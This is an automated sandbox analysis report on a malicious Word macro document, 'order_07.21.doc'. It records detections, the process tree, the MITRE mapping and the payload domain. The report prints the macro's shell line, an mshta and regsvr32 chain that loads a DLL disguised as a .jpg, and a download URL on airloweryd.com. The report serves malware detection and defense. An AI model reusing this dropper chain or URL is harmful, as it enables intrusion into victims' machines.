Loading ...

Play interactive tourEdit tour

Windows Analysis Report order_07.21.doc

Overview

General Information

Sample Name:order_07.21.doc
Analysis ID:452438
MD5:401b19c454075d52bd832725f3c22cfe
SHA1:088f76c184a0cba673abc41bd5582e4e21672fdd
SHA256:6b94e6319e46f52058d5f0c1bc07d7e367152e3bb769f2fd1af097914fe64ce3
Infos:

Most interesting Screenshot:

Detection

Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Register DLL with spoofed extension
Document contains an embedded VBA macro which may execute processes
Document contains an embedded VBA macro with suspicious strings
Document exploit detected (process start blacklist hit)
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Regsvr32 Anomaly
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Document contains no OLE stream with summary information
Document has an unknown application name
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 2696 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
    • cmd.exe (PID: 2480 cmdline: cmd /c c:\programdata\captionEx.hta MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • mshta.exe (PID: 2232 cmdline: 'C:\Windows\SysWOW64\mshta.exe' 'C:\programdata\captionEx.hta' MD5: ABDFC692D9FE43E2BA8FE6CB5A8CB95A)
        • regsvr32.exe (PID: 2544 cmdline: 'C:\Windows\System32\regsvr32.exe' c:\users\public\captionEx.jpg MD5: 432BE6CF7311062633459EEF6B242FB5)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

barindex
Sigma detected: MSHTA Spawning Windows ShellShow sources
Source: Process startedAuthor: Michael Haag: Data: Command: 'C:\Windows\System32\regsvr32.exe' c:\users\public\captionEx.jpg, CommandLine: 'C:\Windows\System32\regsvr32.exe' c:\users\public\captionEx.jpg, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: 'C:\Windows\SysWOW64\mshta.exe' 'C:\programdata\captionEx.hta' , ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 2232, ProcessCommandLine: 'C:\Windows\System32\regsvr32.exe' c:\users\public\captionEx.jpg, ProcessId: 2544
Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: cmd /c c:\programdata\captionEx.hta, CommandLine: cmd /c c:\programdata\captionEx.hta, CommandLine|base64offset|contains: rg, Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2696, ProcessCommandLine: cmd /c c:\programdata\captionEx.hta, ProcessId: 2480
Sigma detected: Regsvr32 AnomalyShow sources
Source: Process startedAuthor: Florian Roth, oscd.community: Data: Command: 'C:\Windows\System32\regsvr32.exe' c:\users\public\captionEx.jpg, CommandLine: 'C:\Windows\System32\regsvr32.exe' c:\users\public\captionEx.jpg, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: 'C:\Windows\SysWOW64\mshta.exe' 'C:\programdata\captionEx.hta' , ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 2232, ProcessCommandLine: 'C:\Windows\System32\regsvr32.exe' c:\users\public\captionEx.jpg, ProcessId: 2544

Data Obfuscation:

barindex
Sigma detected: Register DLL with spoofed extensionShow sources
Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\System32\regsvr32.exe' c:\users\public\captionEx.jpg, CommandLine: 'C:\Windows\System32\regsvr32.exe' c:\users\public\captionEx.jpg, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: 'C:\Windows\SysWOW64\mshta.exe' 'C:\programdata\captionEx.hta' , ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 2232, ProcessCommandLine: 'C:\Windows\System32\regsvr32.exe' c:\users\public\captionEx.jpg, ProcessId: 2544

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Multi AV Scanner detection for domain / URLShow sources
Source: airloweryd.comVirustotal: Detection: 10%Perma Link
Multi AV Scanner detection for submitted fileShow sources
Source: order_07.21.docVirustotal: Detection: 48%Perma Link
Source: order_07.21.docReversingLabs: Detection: 15%
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior

Software Vulnerabilities:

barindex
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe
Source: global trafficDNS query: name: airloweryd.com
Source: unknownDNS traffic detected: query: airloweryd.com replaycode: Server failure (2)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{47D4F006-6281-436E-ADD1-2266A057AE87}.tmpJump to behavior
Source: mshta.exe, 00000004.00000003.2089902053.0000000006141000.00000004.00000001.sdmpString found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
Source: mshta.exe, 00000004.00000002.2093556199.00000000036D0000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: mshta.exe, 00000004.00000003.2089902053.0000000006141000.00000004.00000001.sdmpString found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
Source: unknownDNS traffic detected: queries for: airloweryd.com
Source: mshta.exe, 00000004.00000003.2089902053.0000000006141000.00000004.00000001.sdmp, mshta.exe, 00000004.00000003.2089458384.00000000011ED000.00000004.00000001.sdmpString found in binary or memory: http://airloweryd.com/adda/CzJsZLz8s7e1PAiOuESLghxyuWpr1A46cHBNR/dmIczx3VCKJVxOIM45tzrpZTl8IQ06/ryme
Source: mshta.exe, 00000004.00000002.2093556199.00000000036D0000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
Source: mshta.exe, 00000004.00000002.2093556199.00000000036D0000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
Source: mshta.exe, 00000004.00000002.2093825142.00000000038B7000.00000002.00000001.sdmp, regsvr32.exe, 00000006.00000002.2151734903.00000000049B7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
Source: mshta.exe, 00000004.00000002.2093825142.00000000038B7000.00000002.00000001.sdmp, regsvr32.exe, 00000006.00000002.2151734903.00000000049B7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: regsvr32.exe, 00000006.00000002.2148005184.0000000002230000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: regsvr32.exe, 00000006.00000002.2147708765.0000000001F30000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
Source: mshta.exe, 00000004.00000002.2093825142.00000000038B7000.00000002.00000001.sdmp, regsvr32.exe, 00000006.00000002.2151734903.00000000049B7000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: mshta.exe, 00000004.00000002.2093825142.00000000038B7000.00000002.00000001.sdmp, regsvr32.exe, 00000006.00000002.2151734903.00000000049B7000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: regsvr32.exe, 00000006.00000002.2148005184.0000000002230000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
Source: mshta.exe, 00000004.00000002.2093556199.00000000036D0000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
Source: mshta.exe, 00000004.00000002.2093825142.00000000038B7000.00000002.00000001.sdmp, regsvr32.exe, 00000006.00000002.2151734903.00000000049B7000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
Source: mshta.exe, 00000004.00000002.2093556199.00000000036D0000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: mshta.exe, 00000004.00000002.2093556199.00000000036D0000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
Source: C:\Windows\SysWOW64\mshta.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
Source: Screenshot number: 4Screenshot OCR: Enable editing" button on the top bar, and then click "Enable content"
Source: Screenshot number: 4Screenshot OCR: Enable content"
Source: Document image extraction number: 0Screenshot OCR: Enable editing" button on the top bar, and then click "Enable content"
Source: Document image extraction number: 0Screenshot OCR: Enable content"
Source: Document image extraction number: 1Screenshot OCR: Enable editing" button on the top bar, and then click "Enable content"
Source: Document image extraction number: 1Screenshot OCR: Enable content"
Source: Screenshot number: 8Screenshot OCR: Enable editing" button on the top bar, and then click "Enable content" RegSvr32 :oh,::du|e "c:\u
Source: Screenshot number: 8Screenshot OCR: Enable content" RegSvr32 :oh,::du|e "c:\users\public\captionExjpg" failed to Make surethe binary
Source: Screenshot number: 12Screenshot OCR: Enable editing" button on the top bar, and then click "Enable content" O P a S [J a I @
Source: Screenshot number: 12Screenshot OCR: Enable content" O P a S [J a I @ 100% G) A GE)
Document contains an embedded VBA macro which may execute processesShow sources
Source: order_07.21.docOLE, VBA macro line: arrayObjectButt = Shell("cmd /c " & windowLst)
Document contains an embedded VBA macro with suspicious stringsShow sources
Source: order_07.21.docOLE, VBA macro line: windowLst = "c:\programdata\captionEx.hta"
Source: C:\Windows\SysWOW64\mshta.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
Source: order_07.21.docOLE, VBA macro line: Sub document_open()
Source: order_07.21.docOLE indicator, VBA macros: true
Source: order_07.21.docOLE indicator has summary info: false
Source: order_07.21.docOLE indicator application name: unknown
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: mshta.exe, 00000004.00000002.2093556199.00000000036D0000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
Source: classification engineClassification label: mal96.expl.evad.winDOC@8/11@3/1
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$der_07.21.docJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRB8E2.tmpJump to behavior
Source: order_07.21.docOLE document summary: title field not present or empty
Source: order_07.21.docOLE document summary: author field not present or empty
Source: order_07.21.docOLE document summary: edited time not present or 0
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: order_07.21.docVirustotal: Detection: 48%
Source: order_07.21.docReversingLabs: Detection: 15%
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c c:\programdata\captionEx.hta
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\mshta.exe 'C:\Windows\SysWOW64\mshta.exe' 'C:\programdata\captionEx.hta'
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' c:\users\public\captionEx.jpg
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c c:\programdata\captionEx.htaJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\mshta.exe 'C:\Windows\SysWOW64\mshta.exe' 'C:\programdata\captionEx.hta' Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' c:\users\public\captionEx.jpgJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior

Data Obfuscation:

barindex
Source: C:\Windows\SysWOW64\mshta.exeCode function: 4_3_02BB1258 push esi; ret 4_3_02BB126D
Source: C:\Windows\SysWOW64\mshta.exeCode function: 4_3_02BB1253 push esi; ret 4_3_02BB1255
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exe TID: 3060Thread sleep time: -300000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2488Thread sleep time: -60000s >= -30000sJump to behavior
Source: mshta.exe, 00000004.00000003.2089902053.0000000006141000.00000004.00000001.sdmpBinary or memory string: VMware_S
Source: mshta.exe, 00000004.00000002.2094774284.0000000006162000.00000004.00000001.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: C:\Windows\SysWOW64\mshta.exeMemory protected: page read and write | page guardJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\mshta.exe 'C:\Windows\SysWOW64\mshta.exe' 'C:\programdata\captionEx.hta' Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' c:\users\public\captionEx.jpgJump to behavior
Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting22Path InterceptionProcess Injection11Masquerading1OS Credential DumpingSecurity Software Discovery1Remote ServicesEmail Collection1Exfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsExploitation for Client Execution11Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion1LSASS MemoryVirtualization/Sandbox Evasion1Remote Desktop ProtocolClipboard Data1Exfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools11Security Account ManagerRemote System Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection11NTDSFile and Directory Discovery1Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting22LSA SecretsSystem Information Discovery14SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information1Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 452438 Sample: order_07.21.doc Startdate: 22/07/2021 Architecture: WINDOWS Score: 96 21 Multi AV Scanner detection for domain / URL 2->21 23 Multi AV Scanner detection for submitted file 2->23 25 Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) 2->25 27 7 other signatures 2->27 8 WINWORD.EXE 303 27 2->8         started        process3 process4 10 cmd.exe 1 8->10         started        process5 12 mshta.exe 1 16 10->12         started        dnsIp6 17 airloweryd.com 12->17 19 192.168.2.255 unknown unknown 12->19 15 regsvr32.exe 12->15         started        process7

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
order_07.21.doc48%VirustotalBrowse
order_07.21.doc14%MetadefenderBrowse
order_07.21.doc15%ReversingLabsDocument-Office.Trojan.Sadoca

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
airloweryd.com10%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
